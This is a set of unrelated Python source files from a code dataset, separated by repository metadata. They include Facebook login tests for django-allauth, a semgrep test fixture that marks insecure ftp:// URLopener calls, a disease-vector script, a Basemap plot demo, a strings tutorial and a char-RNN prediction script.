    def test_username_conflict(self):
        # A clashing local user forces the generated username to fall back
        # to the first name.
        User = get_user_model()
        User.objects.create(username='raymond.penners')
        self.login(self.get_mocked_response())
        socialaccount = SocialAccount.objects.get(uid='630595557')
        self.assertEqual(socialaccount.user.username, 'raymond')
    def test_username_based_on_provider(self):
        # No conflict: the Facebook "username" field is used verbatim.
        self.login(self.get_mocked_response())
        socialaccount = SocialAccount.objects.get(uid='630595557')
        self.assertEqual(socialaccount.user.username, 'raymond.penners')
    def test_username_based_on_provider_with_simple_name(self):
        # Payload without a "username" key: derived from the first name.
        data = '{"id": "1234567", "name": "Harvey McGillicuddy"}'
        self.login(self.get_mocked_response(data=data))
        socialaccount = SocialAccount.objects.get(uid='1234567')
        self.assertEqual(socialaccount.user.username, 'harvey')
    def test_media_js(self):
        # The provider's JS snippet must embed the configured app id.
        provider = providers.registry.by_id(FacebookProvider.id)
        request = RequestFactory().get(reverse('account_login'))
        request.session = {}
        script = provider.media_js(request)
        self.assertTrue('"appId": "app123id"' in script)
    def test_login_by_token(self):
        # First GET primes the session; the patched requests module serves
        # the mocked Graph API profile, one response per pop().
        resp = self.client.get(reverse('account_login'))
        with patch('allauth.socialaccount.providers.facebook.views'
                   '.requests') as requests_mock:
            mocks = [self.get_mocked_response().json()]
            requests_mock.get.return_value.json \
                = lambda: mocks.pop()
            resp = self.client.post(reverse('facebook_login_by_token'),
                                    data={'access_token': 'dummy'})
            self.assertRedirects(resp, 'http://testserver/accounts/profile/',
                                 fetch_redirect_response=False)
    @override_settings(
        SOCIALACCOUNT_PROVIDERS={
            'facebook': {
                'AUTH_PARAMS': {'auth_type': 'reauthenticate'},
                'VERIFIED_EMAIL': False}})
    def test_login_by_token_reauthenticate(self):
        # Reauthenticate flow: the nonce rendered into the login page must
        # round-trip; mocks.pop() serves the nonce check first, then the
        # profile (list is consumed right-to-left).
        resp = self.client.get(reverse('account_login'))
        nonce = json.loads(resp.context['fb_data'])['loginOptions']['auth_nonce']
        with patch('allauth.socialaccount.providers.facebook.views'
                   '.requests') as requests_mock:
            mocks = [self.get_mocked_response().json(),
                     {'auth_nonce': nonce}]
            requests_mock.get.return_value.json \
                = lambda: mocks.pop()
            resp = self.client.post(reverse('facebook_login_by_token'),
                                    data={'access_token': 'dummy'})
            self.assertRedirects(resp, 'http://testserver/accounts/profile/',
                                 fetch_redirect_response=False)
    @override_settings(
        SOCIALACCOUNT_PROVIDERS={
            'facebook': {
                'VERIFIED_EMAIL': True}})
    def test_login_verified(self):
        # With VERIFIED_EMAIL on, the imported address is marked verified.
        emailaddress = self._login_verified()
        self.assertTrue(emailaddress.verified)
    def test_login_unverified(self):
        # Relies on the class-level override (VERIFIED_EMAIL False).
        emailaddress = self._login_verified()
        self.assertFalse(emailaddress.verified)
    def _login_verified(self):
        # Shared helper: log in via the mocked profile and return the
        # EmailAddress record created for it.
        resp = self.login(self.get_mocked_response())
        return EmailAddress.objects.get(email='raymond.penners@gmail.com')
|
[
"shubh.aggarwal.37@gmail.com"
] |
shubh.aggarwal.37@gmail.com
|
51ef9ebcaa98ebc7587f1a24b2cf0e33fca79a0f
|
127ed1ba90dcced8cce8366a5139973f1d21c372
|
/python/lang/security/audit/insecure-transport/urllib/insecure-urlopener-open-ftp.py
|
edb25f3b511977c953c437733a648bdd97fd483d
|
[] |
no_license
|
Silentsoul04/semgrep-rules-1
|
f0c53e04b4239555a688bca687340af4736d2514
|
81b81481c0a81e45d3ffba8d60dd98491a1b0446
|
refs/heads/master
| 2022-12-22T15:41:34.399652
| 2020-09-13T14:59:38
| 2020-09-13T14:59:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,388
|
py
|
# Test fixture for the semgrep rule ``insecure-urlopener-open-ftp``.
# The ``# ruleid:`` / ``# ok:`` comments below are semgrep test
# annotations (expected finding / expected non-finding). Do NOT edit,
# move, or reword them: each must stay on the line directly above the
# call it refers to, or the rule's test suite breaks.
from urllib.request import URLopener
def test1():
    od = URLopener()
    # ruleid: insecure-urlopener-open-ftp
    od.open("ftp://example.com")
def test1_ok():
    od = URLopener()
    # ok: insecure-urlopener-open-ftp
    od.open("ftps://example.com")
def test2():
    od = URLopener()
    # ruleid: insecure-urlopener-open-ftp
    url = "ftp://example.com"
    od.open(url)
def test2_ok():
    od = URLopener()
    # ok: insecure-urlopener-open-ftp
    url = "ftps://example.com"
    od.open(url)
def test3():
    # ruleid: insecure-urlopener-open-ftp
    URLopener().open("ftp://example.com")
def test3_ok():
    # ok: insecure-urlopener-open-ftp
    URLopener().open("ftps://example.com")
def test4():
    # ruleid: insecure-urlopener-open-ftp
    url = "ftp://example.com"
    URLopener().open(url)
def test4_ok():
    # ok: insecure-urlopener-open-ftp
    url = "ftps://example.com"
    URLopener().open(url)
def test5(url = "ftp://example.com"):
    # ruleid: insecure-urlopener-open-ftp
    URLopener().open(url)
def test5_ok(url = "ftps://example.com"):
    # ok: insecure-urlopener-open-ftp
    URLopener().open(url)
def test6(url = "ftp://example.com"):
    od = URLopener()
    # ruleid: insecure-urlopener-open-ftp
    od.open(url)
def test6_ok(url = "ftps://example.com"):
    od = URLopener()
    # ok: insecure-urlopener-open-ftp
    od.open(url)
|
[
"manhnguyen510@gmail.com"
] |
manhnguyen510@gmail.com
|
4c5c34eeb833bb131f5c7d69cd376b51d860a327
|
5c760034921788b8d9e92a9c78f210127e4a6f56
|
/computeDiseaseVec.py
|
1e20bc183c04d65bdf8f75c316df7b041cd6a76d
|
[] |
no_license
|
DiliSimon/HopHacks19
|
80c6d1a99aa3586a94f5087aa46c0f2beb72ee5d
|
afd1579e3f4fde8a3abd468f97af67b99588e8bb
|
refs/heads/master
| 2021-02-10T23:36:00.186011
| 2020-03-02T17:22:01
| 2020-03-02T17:22:01
| 244,429,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 938
|
py
|
from defaultlist import defaultlist

# Build one averaged "symptom presence" vector per disease from
# disease_vector.csv: entry j of disease i ends up as the fraction of
# disease i's rows whose j-th score is non-zero.
# Each CSV line is assumed to look like "<disease name> [s0, s1, ..., sk]"
# (name, space, bracketed comma-separated integers) — TODO confirm
# against whatever writes disease_vector.csv.

# Ordered disease names; a disease's position in this list is its index
# everywhere below.
dlist = []
with open('disease_list') as f:
    for l in f:
        dlist.append(l.strip('\n'))

# First pass: number of CSV rows per disease (the averaging denominator).
dNum = defaultlist(int)
with open('disease_vector.csv') as f:
    for l in f:
        dname = l.split('[')[0][:-1]
        indexOfDisease = dlist.index(dname)
        dNum[indexOfDisease] += 1

# Second pass: accumulate 1/dNum[i] for every non-zero score.
# BUG FIX: the original re-created dveclist[indexOfDisease] on *every*
# line, discarding the contributions of all earlier rows of the same
# disease (so only the last row survived). Initialize each disease's
# accumulator exactly once.
dveclist = defaultlist(list)
initialized = set()
with open('disease_vector.csv') as f:
    for l in f:
        dname = l.split('[')[0][:-1]
        indexOfDisease = dlist.index(dname)
        if indexOfDisease not in initialized:
            initialized.add(indexOfDisease)
            dveclist[indexOfDisease] = defaultlist(int)
        scorelist = l.split('[')[1].split(',')
        for ind in range(len(scorelist)):
            if ind == len(scorelist) - 1:
                # Last item still carries the closing "]" plus newline.
                scorelist[ind] = scorelist[ind][:-2]
            if not int(scorelist[ind]) == 0:
                dveclist[indexOfDisease][ind] += 1 / dNum[indexOfDisease]

print(dveclist)
# Report diseases that received no vector at all (likely name mismatches
# between disease_list and disease_vector.csv).
for ind in range(len(dveclist)):
    if dveclist[ind] == []:
        print(ind)
|
[
"Gtingwen@outlook.com"
] |
Gtingwen@outlook.com
|
8f3fd56d7fcc53dff4b0a0f3e9943652e4108514
|
9e70af68afebb05e66381e4f6a978eb1b7589c46
|
/mywork/testsurface.py
|
9c9f460c955f27a1e39564e43c413a7f23928d5c
|
[] |
no_license
|
OuYangMinOa/space-Physic
|
cbca14b3948ac204c35327fbb9cc6ab9eb704d76
|
e8e6ec7379a8cecb944add6dbbbee213dae1b018
|
refs/heads/master
| 2022-11-11T08:09:59.844261
| 2020-06-28T20:14:24
| 2020-06-28T20:14:24
| 275,657,789
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 745
|
py
|
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
import numpy as np
from netCDF4 import Dataset  # NOTE(review): unused in this snippet
import os  # NOTE(review): unused in this snippet
# Default (whole-globe cylindrical) basemap with coastlines + filled land.
m = Basemap()
m.drawcoastlines()
m.fillcontinents()
# Graticule every 30 degrees; labels=[1,1,0,1] labels left/right/bottom.
m.drawparallels(np.arange(-90,90,30),labels=[1,1,0,1], fontsize=8)
m.drawmeridians(np.arange(0,360,30),labels=[1,1,0,1], rotation=45, fontsize=8)
plt.xlabel('Longitude', labelpad=40)
plt.ylabel('Latitude', labelpad=40)
# Synthetic demo field on a 1-degree mesh; x holds latitudes, y longitudes.
x = np.arange(-90,90,1)
y = np.arange(-180,180,1)
x,y = np.meshgrid(x,y)
z = np.sin(x/100)**10 + np.cos(10 + y*x/10000) * np.cos(x/100)
##mappable = plt.cm.ScalarMappable(cmap=plt.cm.viridis)
##mappable.set_array(z)
print(z.shape)
# Note the (lon, lat) = (y, x) argument order; zorder=2 draws the field
# above the filled continents, alpha keeps coastlines visible through it.
m.pcolormesh(y,x,z,zorder=2,cmap='Spectral_r',alpha=0.7)
plt.colorbar()
plt.show()
|
[
"noreply@github.com"
] |
noreply@github.com
|
4a47b93956005fbcfc0bdd1b548ae397f80962e4
|
ac255a4ddae0644b7599531b69d5cd34c855358c
|
/yt-corey-schafer/2-strings.py
|
193a1f3e3c2c590b987bf78bde4c03a746338470
|
[] |
no_license
|
mickosav/python
|
23bc992a83324395f88b8e6a6cf7d6a9f42c9f1e
|
16c381c9edcdcb29f835d02eac8e15d84c186fa9
|
refs/heads/master
| 2020-08-25T09:09:33.938495
| 2020-03-10T12:21:06
| 2020-03-10T12:21:06
| 216,989,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 870
|
py
|
# Tour of Python string basics: literals, length/type, indexing and
# slicing, common methods, and the three main formatting styles.
message = 'Hello Micko'
message_multiline = '''bla bla blalalll
hello lsakdjfl '''
print(message)
print(message_multiline)

# len() counts characters; every string literal is an instance of str.
print(len(message))
print(type(message))  # -> <class 'str'>
print(message[0])

# Slices take [start:stop) — start included, stop excluded; either end
# may be omitted.
for piece in (message[0:5], message[:5], message[6:]):
    print(piece)

# String methods never mutate — each call returns a brand-new string.
for transformed in (message.lower(), message.upper()):
    print(transformed)
print(message.count('Micko'))
print(message.find('Hello'))
print(message.find('asdfasdfasdf'))  # substring absent -> -1

message_pera = message.replace('Micko', 'Pera')
print(message_pera)

# Three ways to build the same greeting: concatenation, str.format, and
# an f-string (f-strings require Python >= 3.6).
gretting = 'Hello'
name = 'Mickon'
print(gretting + ', ' + name + '. Welcome!')
print('{}, {}. Welcome!'.format(gretting, name))
print(f'{gretting}, {name.upper()}. Welcome!')
|
[
"mickosavovic@gmail.com"
] |
mickosavovic@gmail.com
|
cde76863a99e655e46b43112532dd7da3bcc13d4
|
1bde0c807f17fc431b04b4b9cb338ee3acd34b7d
|
/.history/predict_20210713124241.py
|
7c01488a87ec48a2cd94cb2965aba58fb29d0d56
|
[] |
no_license
|
Harrysibbenga/Pytorch-NLP
|
cf9d7e6376d5e19929e6703c3342c81c1a128be1
|
6f22f6ac5f2bf37f27ed2d6285f3a154eda4b566
|
refs/heads/main
| 2023-06-19T22:43:35.513874
| 2021-07-14T19:45:15
| 2021-07-14T19:45:15
| 385,595,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 822
|
py
|
from model import *
from data import *
import sys
# Load the trained character-level RNN classifier checkpoint.
# NOTE(review): torch.load unpickles arbitrary objects — only load
# checkpoint files you trust.
rnn = torch.load('char-rnn-classification.pt')
# Run the RNN over a whole line tensor and return the final step's
# output (per-category scores).
def evaluate(line_tensor):
    # Fresh hidden state per line; feed one character tensor at a time,
    # threading the hidden state through the sequence.
    hidden = rnn.initHidden()
    for i in range(line_tensor.size()[0]):
        output, hidden = rnn(line_tensor[i], hidden)
    return output
def predict(line, n_predictions=3):
    """Print and return the top ``n_predictions`` categories for *line*.

    Returns a list of ``[score, category_name]`` pairs, best first.
    Scores are taken straight from the network output (higher = more
    likely) — presumably log-probabilities; confirm against model.py.
    """
    output = evaluate(Variable(lineToTensor(line)))
    # Get top N categories
    topv, topi = output.data.topk(n_predictions, 1, True)
    predictions = []
    for i in range(n_predictions):
        value = topv[0][i]
        category_index = topi[0][i]
        print('(%.2f) %s' % (value, all_categories[category_index]))
        predictions.append([value, all_categories[category_index]])
    return predictions
if __name__ == '__main__':
    # CLI usage: python predict.py <line-to-classify>
    predict(sys.argv[1])
|
[
"sibbengaharry@gmail.com"
] |
sibbengaharry@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.